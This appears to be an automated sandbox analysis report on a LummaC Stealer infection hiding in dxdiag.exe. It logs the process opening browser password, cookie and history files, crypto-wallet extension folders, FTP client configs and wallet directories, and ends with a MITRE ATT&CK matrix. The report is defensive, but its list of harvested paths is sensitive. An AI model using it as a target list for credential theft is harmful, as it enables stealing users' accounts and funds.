Source: dxdiag.exe, 00000007.00000003.1676727815.0000000002F69000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1676142921.0000000002F69000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000002.1708428233.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\SysWOW64\dxdiag.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: dxdiag.exe PID: 1984, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: dxdiag.exe, 00000007.00000003.1662361641.0000000002F65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: dxdiag.exe, 00000007.00000003.1662361641.0000000002F65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: dxdiag.exe, 00000007.00000003.1662361641.0000000002F65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: dxdiag.exe, 00000007.00000003.1662411147.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: dxdiag.exe, 00000007.00000003.1662361641.0000000002F65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: dxdiag.exe, 00000007.00000003.1662385365.0000000002F60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: dxdiag.exe, 00000007.00000003.1662466227.0000000002F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior

Source: Yara match

File source: Process Memory Space: dxdiag.exe PID: 1984, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: dxdiag.exe PID: 1984, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	2 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	311 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	12 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	24 System Information Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	221 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	121 Masquerading	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
